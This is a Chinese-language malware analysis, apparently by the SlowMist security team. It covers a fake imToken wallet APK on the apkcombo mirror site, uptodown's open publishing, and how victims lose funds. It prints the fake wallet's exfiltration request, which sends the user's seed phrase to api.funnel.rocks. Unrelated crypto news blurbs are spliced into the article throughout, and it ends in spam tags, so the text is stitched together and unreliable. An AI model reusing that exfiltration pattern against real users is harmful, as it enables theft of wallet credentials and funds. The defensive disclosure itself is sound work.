Web3 假钱包第三方源调查分析：如何甄别网络钓鱼攻击？

慢雾安全团队建议使用钱包、交易所时请认准官方下载渠道并从多方进行验证。

原文：https://foresightnews.pro/article/h5Detail/31716

作者：山&耀

转自：ForesightNews

背景

基于区块链技术的Web3正在驱动下一代技术革命，越来越多的人开始参与到这场加密浪潮中，但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林，身处Web3世界中，钱包则是进入Web3世界的入口以及通行证。

当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中，你会发现在一条公链上每个应用都是使用钱包「登录」；这与我们传统意义上的「登录」不同，在Web2世界中，每个应用之间的账户不全是互通的。但在Web3的世界中，所有应用都是统一使用钱包去进行「登录」，我们可以看到「登录」钱包时显示的不是「LoginwithWallet」，取而代之的是「ConnectWallet」。而钱包是你在Web3世界中的唯一通行证。

Magic Eden Ventures已投资11家Web3游戏工作室:金色财经报道，跨链NFT平台Magic Eden宣布其风险投资部门Magic Eden Ventures已经投资了11家web3游戏工作室。Magic Eden最近聘请了首席游戏官Chris Akhavan，并将业务扩展到Polygon区块链平台。支持的合作伙伴包括MatchDay, Blockstars, Epic League, Intella X等。

这11个工作室既有web3原生开发者，也有传统游戏背景的工作室。[2023/2/24 12:26:27]

俗话说高楼之下必有阴影，在如此火热的Web3世界里，钱包作为入口级应用，自然也被黑灰产业链盯上。

在Android环境下，由于很多手机不支持GooglePlay或者因为网络问题，很多人会从其他途径下载GooglePlay的应用，比如：apkcombo、apkpure等第三方下载站，这些站点往往标榜自己App是从GooglePlay镜像下载的，但是其真实安全性如何呢？

a16z：重新启动Web3初创者加速器计划“Crypto Startup School”:10月19日消息，a16z Crypto宣布重新启动Crypto Startup School（CSS）并将其扩展为一个完整的加速器计划。a16z Crypto于2020年2月启动了CSS，目标是帮助开发者创建新的Web3项目，已帮助Phantom、Goldfinch等应用筹集了超过3亿美元资金并打造了用户喜爱的产品。

据悉，CSS计划中除了教育和指导部分，参与者将获得50万美元的种子资金来建立他们的公司。该计划将于2023年3月6日开始，持续12周，团队将在加利福尼亚州洛杉矶亲自参与，申请现已开放，截止日期为2022年11月30日。[2022/10/19 17:31:52]

网站分析

Web3社交网络DSCVR完成900万美元种子轮融资，Polychain Capital领投:7月25日消息，DFINITY 生态去中心化 Web3 社交网络 DSCVR 完成 900 万美元种子轮融资，本轮融资由 Polychain Capital 领投，Upfront Ventures、Tomahawk VC、Fyrfly Venture Partners、Shima Capital 和 Bertelsmann Digital Media Investments (BDMI) 参投。

DSCVR 首席执行官兼联合创始人 Rick Porter 透露，其平台用户正在呈指数级增长，这笔最新融资将支持其加速路线图、以及其他 Token 和 NFT 生态系统集成，并且推出治理工具帮助 DSCVR 社区成为去中心化自治组织。（Prnewswire）[2022/7/25 2:36:41]

鉴于下载途径众多，我们今天以apkcombo为例看看，apkcombo是一个第三方应用市场，它提供的应用据官方说大部分来源于其他正规应用商店，但事实是否真如官方所说呢？

Web3初创公司DaoLens寻求在获得新资金后简化DAO结构:7月15日消息，印度初创企业DaoLens周三表示筹集一笔未披露的新资金，之后该公司正寻求精简去中心化自治组织（DAO）的运营结构。

DaoLens首席执行官Vikram Aditya表示，在当前的加密熊市中，DaoLens将帮助引入新的投票机制，以解决DAO行业内投票者普遍冷漠的问题。据估计，只有0.5%的DAO成员积极投票。

据此前报道，DAOLens宣布完成500万美元融资，Nexus Venture Partners、Better Ventures和iSeed II领投，Coinbase董事会成员Gokul Rajaram、Polygon联合创始人Sandeep Nailwal、Solana联合创始人Raj Gokal、Animoca Brands副总裁Simon Doherty和Tribe Capital联合创始人Arjun Sethi等参投。筹集资金将用于产品开发、人才引进，并推动其工具堆栈的后续推出。（Beincrypto）[2022/7/15 2:15:37]

我们先看下apkcombo的流量有多大：

4月中旬至今风投对Web3游戏和元宇宙行业的投资额近30亿美元:5月19日消息，自4月中旬以来，风险基金和游戏行业巨头向Web3游戏和元宇宙项目投入了近30亿美元，其中规模较大的投融资交易包括风险投资公司White Star Capital旗下DeFi和游戏基金募集了1.2亿美元、Framework Ventures为区块链游戏项目分配了2亿美元，《堡垒之夜》开发商EpicGames从索尼和乐高筹集20亿美元，以创建元宇宙。（Cointelegraph）[2022/5/19 3:27:07]

据数据统计站点similarweb统计，apkcombo站点：

全球排名：1,809国家排名：7,370品类排名：168我们可以看到它的影响力和流量都非常大。它默认提供了一款chromeAPK下载插件，我们发现这款插件的用户数达到了10W：

那么回到我们关注的Web3领域中钱包方向，用户如果从这里下载的钱包应用安全性如何？我们拿知名的imToken钱包为例，其GooglePlay的正规下载途径为：https://play.google.com/store/apps/details?id=im.token.app

由于很多手机不支持GooglePlay或者因为网络问题，很多人会从这里下载GooglePlay的应用。而apkcombo镜像站的下载路径为：https://apkcombo.com/downloader/#package=im.token.app

上图我们可以发现，apkcombo提供的版本为24.9.11，经由imToken确认后，这是一个并不存在的版本！证实这是目前市面上假imToken钱包最多的一个版本。

在编写本文时imToken钱包的最新版本为2.11.3，此款钱包的版本号很高，显然是为了伪装成一个最新版本而设置的。

如下图，我们在apkcombo上发现，此假钱包版本显示下载量较大，此处的下载量应该是爬取的GooglePlay的下载量信息，安全起见，我们觉得有必要披露这个恶意App的来源，防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如：uptodown下载地址：https://imtoken.br.uptodown.com/android

我们发现uptodown任意注册即可发布App，这导致钓鱼的成本变得极低：

钱包分析

在之前我们已经分析过不少假钱包的案例，如：2021-11-24我们披露：《慢雾：假钱包App已致上万人被盗，损失高达十三亿美元》，所以在此不再赘述。

我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析，在开始界面创建钱包或导入钱包助记词时，虚假钱包会将助记词等信息发送到钓鱼网站的服务端去，如下图：

根据逆向APK代码和实际分析流量包发现，助记词发送方式：

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

看下图，最早的「api.funnel.rocks」证书出现在2022-06-03，也就是攻击开始的大概时间：

俗话说一图胜千言，最后我们画一个流程图：

总结

目前这种局活动不仅活跃，甚至有扩大范围的趋势，每天都有新的受害者受。用户作为安全体系最薄弱的环节，应时刻保持怀疑之心，增强安全意识与风险意识，当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证；如果你的钱包从上述镜像站下载，请第一时间转移资产并卸载该软件，必要时可通过官方验证通道核实。

同时，如需使用钱包，请务必认准以下主流钱包App官方网址：

imToken钱包：https://token.im/TokenPocket钱包：https://www.tokenpocket.pro/TronLink钱包：https://www.tronlink.org/比特派钱包：https://bitpie.com/MetaMask钱包：https://metamask.io/TrustWallet：https://trustwallet.com/请持续关注慢雾安全团队，更多Web3安全风险分析与告警正在路上。

致谢：感谢在溯源过程中imToken官方提供的验证支持。

由于保密性和隐私性，本文只是冰山一角。慢雾在此建议，用户需加强对安全知识的了解，进一步强化甄别网络钓鱼攻击的能力等，避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。

?

标签：WEBWEB3COMKENWebchainweb3.0币怎么提现到账号Community Nodemytoken币可以换人民币吗

比特币价格实时行情热门资讯